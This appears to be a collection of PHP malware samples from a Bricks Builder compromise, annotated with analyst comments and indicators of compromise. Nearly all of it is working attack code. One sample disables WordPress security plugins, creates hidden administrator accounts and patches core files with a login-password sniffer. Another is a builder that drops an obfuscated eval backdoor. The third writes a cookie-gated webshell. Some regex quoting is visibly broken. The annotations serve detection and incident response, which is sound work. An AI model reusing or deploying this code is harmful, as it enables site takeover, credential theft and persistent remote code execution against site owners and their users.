Bricks Builder <1.9.6.1 Malware
<?php | |
// Hide every runtime error: nothing reaches the response body or the PHP error log,
// and almost every later call is additionally @-suppressed.  For the defender this
// means the web-server error log will not record the plugin renames, file writes or
// failed database calls that follow.
@ini_set('display_errors', 0); | |
@ini_set('log_errors', 0); | |
@error_reporting(0); | |
// Returns $length characters taken (from offset 1) out of a shuffled copy of the
// [0-9a-zA-Z] alphabet, repeated enough times to cover $length.  str_shuffle() uses
// the ordinary PRNG.  The result is used as the per-site "auth_key" in gwi()
// (56 chars) and as the plaintext password of the account created in awu() (8 chars).
function genstr($length = 10) | |
{ | |
return substr(str_shuffle(str_repeat($x = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil($length / strlen($x)))), 1, $length); | |
} | |
// Per-docroot stage of the sweep.  For a directory $dr that holds a WordPress install
// this (1) disables Sucuri and Wordfence by renaming their bootstrap files,
// (2) scrapes the database credentials and table prefix out of wp-config.php,
// (3) passes them to awu(), which creates a hidden administrator, and (4) has sws()
// patch wp-includes/pluggable.php with a login sniffer.  Returns the populated $cd
// record, or NULL when $dr is not a WordPress root.
// $aa is a by-reference set shared across calls so that databases reachable from
// several docroots are only processed once.
function gwi($dr, &$aa) | |
{ | |
// wp-includes/version.php doubles as the "is this WordPress" test and, once
// included, provides $wp_version in this function's scope.
if (!file_exists("$dr/wp-includes/version.php")) return NULL; | |
if (!@include("$dr/wp-includes/version.php")) return NULL; | |
$cd = array(); | |
$cd['host'] = "none"; | |
// auth_key is the XOR key for the sniffer installed by sws() and also the name of
// the cookie that later dumps the harvested logins: "_" followed by 56 alphanumerics.
$cd['auth_key'] = "_" . genstr(56); | |
$cd['name'] = "wordpress"; | |
$cd['docroot'] = $dr; | |
$cd['ver'] = ""; | |
$cd['db_login'] = ""; | |
$cd['db_passwd'] = ""; | |
$cd['db_name'] = ""; | |
$cd['db_host'] = ""; | |
$cd['db_prefix'] = ""; | |
$cd["wf_status"] = "none"; | |
$cd["wf2_status"] = "none"; | |
$cd["se_status"] = "none"; | |
$cd["users"] = Array(); | |
// Security plugins are neutralised by renaming their entry files to
// <file>backup<random int>.  The renamed copies stay on disk, so a
// wordfence.phpbackup*, bootstrap.phpbackup* or sucuri.phpbackup* under
// wp-content/plugins is a durable post-incident indicator.  Status per plugin:
// "none" (absent), "disabled" (renamed) or "cantdisable" (rename failed).
$bp = $dr . "/wp-content/plugins/"; | |
$ntd = array("se_status" => "sucuri-scanner/sucuri.php", | |
"wf_status" => "wordfence/wordfence.php", "wf2_status" => "wordfence/waf/bootstrap.php"); | |
foreach ($ntd as $name=>$pg) { | |
if (is_file($bp . $pg)) { | |
@rename($bp . $pg, $bp . $pg . "backup" . rand()); | |
if (is_file($bp . $pg)) { | |
$cd[$name] = "cantdisable"; | |
} else { | |
$cd[$name] = "disabled"; | |
} | |
} | |
} | |
if (!isset($wp_version)) { | |
$wp_version = "unknown"; | |
} | |
// wp-config.php is parsed as text: single-quoted define('NAME', 'value') pairs are
// collected and the constant name is matched case-insensitively by substring
// (db_name, db_user, db_password, db_host).  Double-quoted or computed defines are
// not captured.  NOTE: in this copy of the sample the regex literal on the
// preg_match_all() lines has lost its surrounding quote delimiters.
$cnt = @file_get_contents("$dr/wp-config.php"); | |
preg_match_all(/(define\(\s*\')([^\']+)(\',\s*\')([^\']+)/, $cnt, $m); | |
if (is_array($m)) { | |
for ($i = 0; $i < count($m[2]); $i++) { | |
if (stristr($m[2][$i], "db_name")) { | |
$cd['db_name'] = $m[4][$i]; | |
} elseif (stristr($m[2][$i], "db_user")) { | |
$cd['db_login'] = $m[4][$i]; | |
} elseif (stristr($m[2][$i], "db_password")) { | |
$cd['db_passwd'] = $m[4][$i]; | |
} elseif (stristr($m[2][$i], "db_host")) { | |
$cd['db_host'] = $m[4][$i]; | |
} | |
} | |
} | |
// Table prefix: the first quoted $table_prefix assignment found.
preg_match_all(/table_prefix\s*=\s*['"](.*)['"];/, $cnt, $m); | |
if (is_array($m)) { | |
$cd['db_prefix'] = $m[1][0]; | |
} | |
$cd['ver'] = $wp_version; | |
// Database side first (admin user creation), then file side (sniffer); sws()
// returns the finished record.
$cd = awu($cd, $aa); | |
return sws($dr, $cd); | |
} | |
// Installs the login sniffer into $docroot/wp-includes/pluggable.php and records the
// outcome in $cd["sniffer_status"] ("already" | "installed" | "error").
// Two snippets are templated with the site's auth key:
//   $pd - inserted just before the text "$ignore_codes = array" (in WordPress core
//         that string sits in wp_authenticate(), where $username and $password are
//         in scope -- confirm against the affected version).  On every successful
//         login it XORs "password\tusername\tsiteurl" with the key, hex-encodes the
//         result and appends it both to a dump file and to the wp_options row
//         'wpsdt4_license_key'.
//   $pa - appended to the end of the file.  When a request carries a cookie whose
//         name is the auth key it echoes the option value (or, when that is
//         non-empty, the dump file) and exits -- i.e. any page load serves the
//         harvested logins.
// Detection points: the substring "line ^ str_repeat" in pluggable.php, the
// wp_options row 'wpsdt4_license_key', an extension-less file named by the first 8
// hex digits of md5(auth_key), and CRLF line endings inside a core PHP file.
function sws($docroot, $cd) | |
{ | |
// Anchor searched for in pluggable.php; $pd is prepended to it.
$rep = "\$ignore_codes = array"; | |
$pd = <<< BASE64decoded | |
if (!is_wp_error($user)) | |
{ | |
$csrf = "{AUTHKEY}"; | |
$line = $password . "\t" . $username . "\t" . get_site_url(); | |
$line = $line ^ str_repeat($csrf, (strlen($line) / strlen($csrf)) + 1); | |
$line = bin2hex($line); | |
$lines = @file("{DUMPFILE}", FILE_IGNORE_NEW_LINES); | |
$lines[] = $line; | |
@file_put_contents("{DUMPFILE}", implode("\n", array_unique($lines))); | |
$lines = get_option('wpsdt4_license_key'); | |
$lines = explode("\n", $lines); | |
$lines[] = $line; | |
$lines = array_unique($lines); | |
update_option('wpsdt4_license_key', implode("\n", array_unique($lines))); | |
} | |
BASE64decoded; | |
$pa = <<< BASE64decoded | |
if (isset($_COOKIE["{AUTHKEY}"])) | |
{ | |
$lines = get_option( 'wpsdt4_license_key' ); | |
if (!empty($lines)) | |
{ | |
$lines = @file_get_contents("{DUMPFILE}"); | |
} | |
echo $lines; | |
exit(); | |
} | |
BASE64decoded; | |
$pf = "$docroot/wp-includes/pluggable.php"; | |
$pc = @file_get_contents($pf); | |
// Idempotency: if the sniffer is already present, recover its key from the existing
// '$csrf = "..."' assignment so the dump stays readable, and stop.
if (strpos($pc, "line ^ str_repeat") !== FALSE) { | |
preg_match_all(/\$csrf\s=\s\"(\w{20,})\";/, $pc, $m); | |
if (is_array($m)) | |
{ | |
$cd["auth_key"] = $m[1][0]; | |
} | |
$cd["sniffer_status"] = "already"; | |
return $cd; | |
} | |
// Dump file name: first 8 hex digits of md5(auth_key), no extension.  The path is
// relative, so the file is created in the working directory of the PHP process that
// handles the login -- normally the site's docroot.
$au = $cd["auth_key"]; | |
$df = substr(md5($au), 0, 8); | |
$pd = str_replace("{AUTHKEY}", $au, $pd); | |
$pd = str_replace("{DUMPFILE}", $df, $pd); | |
$pa = str_replace("{AUTHKEY}", $au, $pa); | |
$pa = str_replace("{DUMPFILE}", $df, $pa); | |
// mtime is captured before the write and restored afterwards, so a modified-time
// scan of wp-includes will not flag the file; compare file hashes against the
// release checksums instead.  Note the injected text uses "\r\n" line endings.
$ot = @stat($pf); | |
$src = @file_get_contents($pf); | |
$src = str_replace($rep, $pd . "\r\n" . $rep, $src); | |
$src = $src . "\r\n" . $pa; | |
@file_put_contents($pf, $src); | |
@touch($pf, $ot["mtime"]); | |
// Success is judged by the key string being present in the re-read file.
if (strpos(@file_get_contents($pf), $au) !== FALSE) { | |
$cd["sniffer_status"] = "installed"; | |
} else { | |
$cd["sniffer_status"] = "error"; | |
} | |
return $cd; | |
} | |
// Database stage.  With the credentials scraped from wp-config.php it connects over
// mysqli, lists every database the account can see and every table in each, and
// treats any table whose name contains "usermeta" as a WordPress install whose
// prefix is the text before "usermeta".  For each prefix it reads siteurl from
// <prefix>options and, unless a user whose login starts with "wpcron" already
// exists there, inserts "wpcron"+8 hex chars with administrator capabilities and
// user_level 10.  (siteurl, login, plaintext password) triples are appended to
// $cd["users"]; $cd["host"] is set from siteurl when the prefix matches wp-config's.
// $aa (by reference) de-duplicates on host+login+password+db+siteurl across calls.
// Indicators in the users table: user_login LIKE 'wpcron%', user_registered equal
// to '1979-01-01 00:00:00', and a user_pass that is a bare 32-hex MD5 rather than a
// salted WordPress hash.
function awu($cd, &$aa) | |
{ | |
$dbn = $cd['db_name']; | |
$dbu = $cd['db_login']; | |
$dbp = $cd['db_passwd']; | |
$dh = $cd['db_host']; | |
$dpfx = $cd['db_prefix']; | |
if (!empty($dbn)) { | |
// DB_HOST may carry a ":port" suffix; otherwise the MySQL default port is used.
if (strpos($dh, ":") !== FALSE) { | |
$hp = explode(":", $dh); | |
$h1 = $hp[0]; | |
$port = intval($hp[1]); | |
} else { | |
$h1 = $dh; | |
$port = 3306; | |
} | |
if ($conn = mysqli_connect($h1, $dbu, $dbp, $dbn, $port)) { | |
// Not limited to the configured database: a shared DB account exposes every
// WordPress site it can reach.
$result = mysqli_query($conn, "SHOW DATABASES;"); | |
$dbs = Array(); | |
while($rw = mysqli_fetch_array($result, MYSQLI_NUM)) | |
{ | |
$dbs[] = $rw; | |
} | |
foreach ($dbs as $cdb) { | |
$cdb = $cdb[0]; | |
// Dead guard left in the code; always taken.
if (TRUE) { | |
mysqli_select_db($conn, $cdb); | |
$result2 = mysqli_query($conn, "SHOW TABLES;"); | |
$tab = Array(); | |
while($rw = mysqli_fetch_array($result2, MYSQLI_NUM)) | |
{ | |
$tab[] = $rw; | |
} | |
foreach ($tab as $wct) { | |
$wct = $wct[0]; | |
// "wp_usermeta" -> prefix "wp_"; custom prefixes are handled the same way.
$ppos = strpos($wct, "usermeta"); | |
if ($ppos !== FALSE) { | |
$pfx = substr($wct, 0, $ppos); | |
$result3 = mysqli_query($conn, "SELECT option_value FROM " . $pfx . "options WHERE option_name='siteurl';"); | |
$su = mysqli_fetch_array($result3, MYSQLI_NUM); | |
// On PHP 8 a failed query here is expected to surface as an exception (mysqli's
// default error mode, or a TypeError from count() on a non-array), which
// error_reporting(0) does not suppress -- so a missing <prefix>options table
// would abort the whole sweep at this point.
if (count($su)) { | |
$su = $su[0]; | |
// Host = element 2 of the "/"-split site URL, with "www." removed.
$do = explode("/", $su); | |
$do = $do[2]; | |
$do = str_replace("www.", "", $do); | |
if ($dpfx === $pfx) | |
{ | |
$cd['host'] = $do; | |
} | |
// Already-planted marker: an existing wpcron* login stops processing of this
// database (break leaves the table loop, not the database loop).
$ra = mysqli_query($conn, "SELECT * FROM " . $pfx . "users WHERE user_login LIKE 'wpcron%';"); | |
if (mysqli_num_rows($ra)) | |
{ | |
break; | |
} | |
$ck = $h1 . $dbu . $dbp . $dbn . $do; | |
if (isset($aa[$ck])) | |
{ | |
continue; | |
} | |
$aa[$ck] = TRUE; | |
// New account: login "wpcron"+8 hex chars derived from the current time; the
// password is stored as a bare md5() of an 8-char plaintext (WordPress accepts
// legacy MD5 hashes in user_pass and rehashes them on login -- confirm for the
// target version); registration date pinned to 1979-01-01.
$usern = 'wpcron' . substr(md5(time()), 0, 8); | |
$pp = genstr(8); | |
$pass = md5($pp); | |
mysqli_query($conn, "INSERT INTO $pfx" . "users (`user_login`, `user_pass`, `user_nicename`, `user_status`, `display_name`, `user_registered`) VALUES ('$usern', '$pass', '$usern', 0, '$usern', '1979-01-01 00:00:00');"); | |
mysqli_query($conn, "SET @created_user_id = LAST_INSERT_ID();"); | |
// Serialized capabilities array {"administrator" => "1"} plus user_level 10
// = a full administrator account.
mysqli_query($conn, "INSERT INTO $pfx" . "usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @created_user_id, '" . $pfx . "capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');"); | |
mysqli_query($conn, "INSERT INTO $pfx" . "usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @created_user_id, '" . $pfx . "user_level', '10');"); | |
mysqli_commit($conn); | |
// The plaintext password is reported back to the operator.
$cd["users"][] = Array($su, $usern, $pp); | |
} | |
} | |
} | |
} | |
} | |
mysqli_close($conn); | |
} | |
} | |
return $cd; | |
} | |
// Lists the entries of $dir as "$dir/<name>" paths, skipping "." and "..".  With
// $od (default TRUE) only directories are returned; otherwise every entry.  A
// one-character $dir (the filesystem root) is kept as-is so "/" is not trimmed to "".
// Returns an empty array when the directory cannot be opened.
function list_dir($dir, $od=TRUE) | |
{ | |
$res = Array(); | |
$dir = strlen($dir) == 1 ? $dir : rtrim($dir, '\\/'); | |
$h = @opendir($dir); | |
if ($h === FALSE) { | |
return $res; | |
} | |
while (($f = readdir($h)) !== FALSE) { | |
if ($f !== '.' and $f !== '..') { | |
$tmp = "$dir/$f"; | |
if ($od) { | |
if (@is_dir($tmp)) { | |
$res[] = $tmp; | |
} | |
} | |
else{ | |
$res[] = $tmp; | |
} | |
} | |
} | |
closedir($h); | |
return $res; | |
} | |
// Entry point of the sweep.  Starting from DOCUMENT_ROOT, walk up with dirname()
// until the path stops changing (the filesystem root), collecting every ancestor in
// $aq.  Then, for each ancestor, collect its subdirectories and their subdirectories,
// i.e. everything up to two levels below every ancestor.  On a shared host this
// reaches sibling vhosts (other customers' docroots), not just the site that ran
// the script.
$bd = Array(); | |
$aq = Array(); | |
$cd = $_SERVER["DOCUMENT_ROOT"]; | |
// dirname("/") is "/" again, which is what terminates this loop; on the first pass
// $aq is empty and the index lookup is an undefined-offset warning (suppressed).
while ($cd = @dirname($cd)) { | |
if ($cd == $aq[count($aq) - 1]) { | |
break; | |
} | |
$aq[] = $cd; | |
} | |
foreach ($aq as $cd) { | |
if (!in_array($cd, $bd)) { | |
$l1 = list_dir($cd); | |
foreach ($l1 as $l1d) | |
{ | |
$bd = array_merge($bd, list_dir($l1d)); | |
} | |
$bd = array_merge($bd, $l1); | |
} | |
} | |
$bd = array_unique(array_merge($aq, $bd)); | |
// Every candidate directory is tried as a WordPress root; gwi() returns NULL for
// non-WordPress directories and otherwise the $cd record (credentials, created
// users, sniffer status).
$aa = Array(); | |
$res = Array(); | |
foreach ($bd as $dc) | |
{ | |
$tmp = gwi($dc, $aa); | |
if ($tmp) | |
{ | |
$res[] = $tmp; | |
} | |
} | |
// Results go back to the operator as a url-encoded serialize() blob between two
// "{MARK}" delimiters; like {AUTHKEY}/{DUMPFILE} in sws() this looks like a
// builder-substituted placeholder.  A response body of this shape in access or
// WAF logs is a detection opportunity.
echo "{MARK}" . rawurlencode(serialize($res)) . "{MARK}"; | |
exit(); | |
<?php | |
// Builder/dropper script.  NOTE: the backslash-escaped quotes (\") throughout this
// file look like an artefact of how the sample was captured (source stored inside an
// escaped string); read them as plain double quotes.
// Polyfills for very old PHP versions that lack these constants.
if(!defined(\"PHP_EOL\")) | |
{ | |
define(\"PHP_EOL\", \"\n\"); | |
} | |
if(!defined(\"DIRECTORY_SEPARATOR\")) | |
{ | |
define(\"DIRECTORY_SEPARATOR\", \"/\"); | |
} | |
// Random string of $length letters from a fixed mixed-case alphabet, drawn with
// rand().  Supplies the XOR key (12 chars) and the randomised identifiers
// (6-12 chars) that are substituted into the loader template below.
function generateRandomStringEval($length = 12) | |
{ | |
$characters = 'AQZSXWCDEVFRBGTHYNMUJabcdefghijklmnopqrstuvwxyz'; | |
$charactersLength = strlen($characters); | |
$randomString = ''; | |
for ($i = 0; $i < $length; $i++) { | |
$randomString .= $characters[rand(0, $charactersLength - 1)]; | |
} | |
return $randomString ; | |
} | |
// Random [0-9a-z] string of $length characters drawn with rand().
// generateRndString(35) becomes the per-deployment key of the embedded backdoor
// (it replaces the GUID placeholder in $origin_backdoor).
function generateRndString($length = 10) | |
{ | |
$characters = '0123456789abcdefghijklmnopqrstuvwxyz'; | |
$charactersLength = strlen($characters); | |
$randomString = ''; | |
for ($i = 0; $i < $length; $i++) { | |
$randomString .= $characters[rand(0, $charactersLength - 1)]; | |
} | |
return $randomString ; | |
} | |
// Same alphabet as generateRndString() with ".php" appended: a random loader
// filename.  Not in use -- the only call to it is commented out near the bottom of
// the script, where a fixed name is assigned instead.
function generateRandomString($length = 10) | |
{ | |
$characters = '0123456789abcdefghijklmnopqrstuvwxyz'; | |
$charactersLength = strlen($characters); | |
$randomString = ''; | |
for ($i = 0; $i < $length; $i++) { | |
$randomString .= $characters[rand(0, $charactersLength - 1)]; | |
} | |
return $randomString . \".php\"; | |
} | |
// Obfuscation used to embed the backdoor in the loader: byte $i of $snippet is XORed
// with $template[$i % $xor_number] and the result is urlencode()d.  Only the first
// $xor_number characters of $template ever act as key material, so with the
// rand(3,12) below the effective key is 3 to 12 bytes.  _remove_action() in the
// loader template is the exact inverse.
function _add_action($snippet, $template, $xor_number) | |
{ | |
$splitted = str_split($snippet); | |
$action = \"\"; | |
for ($i = 0; $i < strlen($snippet);$i++) { | |
$action .= $splitted[$i] ^ $template[$i%$xor_number]; | |
} | |
$action = urlencode($action); | |
return $action; | |
} | |
// Docroot guess: the position of REQUEST_URI inside SCRIPT_FILENAME marks where the
// web root ends.  Falls back to DOCUMENT_ROOT when the URI is not found in the path,
// and to "/" when it starts at offset 0.  Decides where the loader file is written.
function GetDocRoot() | |
{ | |
$docroot_end = strrpos($_SERVER['SCRIPT_FILENAME'], $_SERVER['REQUEST_URI']); | |
if ($docroot_end === FALSE) | |
{ | |
return $_SERVER['DOCUMENT_ROOT']; | |
} | |
elseif ($docroot_end === 0) | |
{ | |
return \"/\"; | |
} | |
else | |
{ | |
return substr($_SERVER['SCRIPT_FILENAME'], 0, $docroot_end); | |
} | |
} | |
// Final-stage backdoor, carried here as a heredoc and embedded (XORed + urlencoded)
// in the loader.  What the embedded code does once it runs:
//  - silences error logging and removes the execution time limit;
//  - shdp() is a repeating-key XOR of $data with $key;
//  - a request carrying GET parameter 673435 is answered with md5(47712): a
//    liveness/fingerprint probe, and a cheap thing to alert on in access logs;
//  - every cookie and POST value is base64-decoded, XORed with the deployment key
//    and then with the parameter's own name, and unserialize()d; a payload whose
//    array has key 'ak' either reports phpversion() and 'sv' => '1.0-1' (action
//    'i') or eval()s $data['d'] (action 'e'), then exits.
// Decoding captured C2 traffic therefore needs the per-deployment key, which this
// builder prints exactly once (the "UROK#...#ONDOK#<key>#ENDP" line at the end).
$origin_backdoor = <<< BASE64decoded | |
<?php | |
@ini_set('error_log', NULL); | |
@ini_set('log_errors', 0); | |
@ini_set('max_execution_time', 0); | |
@set_time_limit(0); | |
function shdp($data, $key) | |
{ | |
$out_data = ""; | |
for ($i = 0; $i < strlen($data);) { | |
for ($j = 0; $j < strlen($key) && $i < strlen($data); $j++, $i++) { | |
$out_data .= chr(ord($data[$i]) ^ ord($key[$j])); | |
} | |
} | |
return $out_data; | |
} | |
if (isset($_GET[673435])) | |
{ | |
die(md5(47712)); | |
} | |
$temp=array_merge($_COOKIE, $_POST); | |
foreach ($temp as $data_key => $data) { | |
$data = @unserialize(shdp(shdp(base64_decode($data), '4ef63abe-1abd-45a6-913d-6fb99657e24b'), $data_key)); | |
if (isset($data['ak'])) { | |
if ($data['a'] == 'i') { | |
$i = array( | |
'pv' => @phpversion(), | |
'sv' => '1.0-1', | |
); | |
echo @serialize($i); | |
} elseif ($data['a'] == 'e') { | |
eval($data['d']); | |
} | |
exit(); | |
} | |
} | |
BASE64decoded; | |
// The GUID in the template is only a placeholder; every build gets a fresh
// 35-character key in its place.
$new_pass = generateRndString(35); | |
$origin_backdoor = str_replace(\"4ef63abe-1abd-45a6-913d-6fb99657e24b\",$new_pass,$origin_backdoor ); | |
// Loader template ("evaluaor").  When dropped as a .php file and requested it:
//  1. decodes the urlencoded+XORed backdoor ($i) and the string "file_put_contents"
//     ($j) with _remove_action();
//  2. calls file_put_contents() by its decoded name to write the backdoor to a file
//     named after the XOR key ($index: 12 letters, no extension) in the working
//     directory;
//  3. include_once()s it, which executes the backdoor, then unlink()s it.
// The backdoor therefore exists on disk only for the duration of a request; the
// persistent artefact is the loader, whose identifiers are randomised below so the
// dropped file carries no fixed names.  "xor_number" inside the heredoc is a literal
// that the str_replace step turns into the numeric modulus.
$evaluaor = <<< BASE64decoded | |
<?php | |
function _remove_action($snippet, $template) | |
{ | |
$snippet = urldecode($snippet); | |
$splitted = str_split($snippet); | |
$action = ""; | |
for ($i = 0; $i < strlen($snippet);$i++) { | |
$action .= $splitted[$i] ^ $template[$i%xor_number]; | |
} | |
return $action; | |
} | |
$i="#URLENCODED_CODE#"; | |
$j="#URLENCODED_file_put_contetnts#"; | |
$index="#XORKEY#"; | |
$k = _remove_action($i, $index); | |
$f = _remove_action($j, $index); | |
$f($index, $k); | |
include_once ($index); | |
unlink($index); | |
exit(); | |
BASE64decoded; | |
// Key material: a 12-letter template of which the first $xor_number (3..12)
// characters are actually used -- see _add_action().
$xor_number=rand(3,12); | |
$XORKEY = generateRandomStringEval(12); | |
$URLENCODED_CODE = _add_action($origin_backdoor, $XORKEY, $xor_number); | |
$URLENCODED_CODE_file_put_contents = _add_action(\"file_put_contents\", $XORKEY, $xor_number); | |
// Per-build identifier randomisation: $snippet, $template, $splitted, $index and
// the function name _remove_action are renamed; $i, $j, $k and $f are left as-is.
$snippet_varname = generateRandomStringEval(rand(6,12)); | |
$template_varname = generateRandomStringEval(rand(6,12)); | |
$splitted_varname = generateRandomStringEval(rand(6,12)); | |
$_remove_action_varname = generateRandomStringEval(rand(6,12)); | |
$index_varname = generateRandomStringEval(rand(6,12)); | |
$evaluaor=str_replace('$splitted', \"$\".$splitted_varname, $evaluaor); | |
$evaluaor=str_replace('xor_number', $xor_number, $evaluaor); | |
$evaluaor=str_replace('$index', \"$\".$index_varname, $evaluaor); | |
$evaluaor=str_replace('#XORKEY#', $XORKEY, $evaluaor); | |
$evaluaor=str_replace('_remove_action', $_remove_action_varname, $evaluaor); | |
$evaluaor=str_replace('$template', \"$\".$template_varname, $evaluaor); | |
$evaluaor=str_replace('$snippet', \"$\".$snippet_varname, $evaluaor); | |
$evaluaor=str_replace('#URLENCODED_CODE#', $URLENCODED_CODE, $evaluaor); | |
// The misspelt placeholder matches the one in the template, so the substitution works.
$payload_file=str_replace('#URLENCODED_file_put_contetnts#', $URLENCODED_CODE_file_put_contents, $evaluaor); | |
// Reseeds the PRNG after every rand() call above has already been made, so it has
// no effect on the names or key already chosen.
srand(time()); | |
// file_put_contents() polyfill for PHP versions that lack it; used to write the
// loader below.
if (!function_exists('file_put_contents')) { | |
function file_put_contents($filename, $data) { | |
$f = @fopen($filename, 'w'); | |
if (!$f) { | |
return false; | |
} else { | |
$bytes = fwrite($f, $data); | |
fclose($f); | |
return $bytes; | |
} | |
} | |
} | |
// Drop the loader into the web root.  Several candidate names are left commented
// out; the last assignment wins, so the file is written as "xjc6q59v.php" (the
// earlier "readurl.php" value is overwritten before use).  Search a suspect host
// for both names and for 12-letter extension-less files beside them (the
// backdoor's transient file is named after the XOR key).
//////////////////////////////////////////////////////////////////////////////////////////// | |
$filename = \"readurl.php\"; | |
# $filename = generateRandomString(); | |
#$filename = \"options-reading.php\"; | |
#$filename = \"wp-login.php\"; | |
$filename = \"xjc6q59v.php\"; | |
# get base local and remote path | |
$base_www_path = $host = @$_SERVER['HTTP_HOST']; | |
$base_local_path = GetDocRoot(); | |
$full_payload_name = GetDocRoot() . \"/$filename\"; | |
$good = FALSE; | |
// Result line parsed by the operator's tooling: "UROK#http://<file>#ONDOK#<key>#ENDP".
// Only the bare filename is printed ($host is read but never used) and the 35-char
// key is the only copy of the backdoor's XOR key; $good_counter is never initialised.
// A response body containing these markers is a detection opportunity.
if (file_put_contents($full_payload_name, $payload_file)) | |
{ | |
echo \"UROK#http://\" . $filename. \"#ONDOK#\". $new_pass . \"#ENDP\" . PHP_EOL; | |
$good=TRUE; | |
$good_counter++; | |
exit(); | |
} | |
// Failure marker; the trailing "#CCCURL" is printed on this path as well.
if(!$good) | |
echo \"URL#STATUS_CANTUPLOAD#CCCURL\"; | |
echo \"#CCCURL\"; | |
//unlink(\"dfaonfpfkwg.php\"); | |
exit();?> |
<?php
// Third sample: writes a classic webshell to e9a045b4ce28.php in the working
// directory.  The written shell prints 409723 * 20 (8194460) as a liveness marker;
// when the cookie "d" hashes to 17028f487cb2a84607646da3ad3878ec it eval()s the
// base64-decoded $_REQUEST["id"] and, on POST up=up, copies an uploaded file to its
// original name.  The quoting of the inner string is inconsistent as rendered (the
// outer string is \"-escaped while the inner "d", "ok", ... are not); treat that as
// a capture artefact.  Indicators: the filename above, the fixed hash, and a
// response body beginning "8194460".
file_put_contents(\"e9a045b4ce28.php\",\" | |
<?php echo 409723 * 20; | |
if (md5($_COOKIE["d"]) == "17028f487cb2a84607646da3ad3878ec") { | |
echo "ok"; | |
eval(base64_decode($_REQUEST["id"])); | |
if ($_POST["up"] == "up") { | |
@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]); | |
} | |
} ?> | |
\") | |
;exit;?> |